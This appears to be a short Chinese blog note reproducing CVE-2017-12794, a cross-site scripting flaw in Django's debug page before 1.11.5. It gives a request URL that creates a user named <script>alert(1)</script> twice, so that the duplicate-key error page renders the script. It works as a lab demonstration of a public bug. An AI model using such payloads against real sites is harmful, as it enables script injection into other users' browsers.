Django debug page XSS漏洞(CVE-2017-12794)
2024-09-05 19:16:29
影响版本:1.11.5之前的版本
访问http://your-ip:8000/create_user/?username=<script>alert(1)</script>创建一个用户,成功;再次访问http://your-ip:8000/create_user/?username=<script>alert(1)</script>,触发异常:
Postgres抛出的异常为
duplicate key value violates unique constraint "xss_user_username_key"DETAIL: Key (username)=(<script>alert(1)</script>) already exists.
最新文章
- jquery固定在顶部的导航菜单
- 出现( linker command failed with exit code 1)错误总结 (转)
- linux grep 查找字符串
- JS实现注销功能
- ArcGis在Oracle中常用的sql
- Java编程思想重点
- 私有pod简记
- 安徽省2016“京胜杯”程序设计大赛_D_梯田AGAIN
- webpack打包经验——处理打包文件体积过大的问题
- ascii、unicode、utf-8、gbk 区别
- ES6 Reflect 与 Proxy
- 【洛谷p1605】迷宫
- 如何让Excel单元格中的名字分散对齐
- sql server复制数据到excel格式变成字符串
- Linux内核调试 - 一般人儿我都不告诉他(一)【转】
- Verilog TestBench Coding Style
- python pprint
- Python基础之初始编码
- Codeforces 931 C. Laboratory Work
- C# ?? 运算符是什么?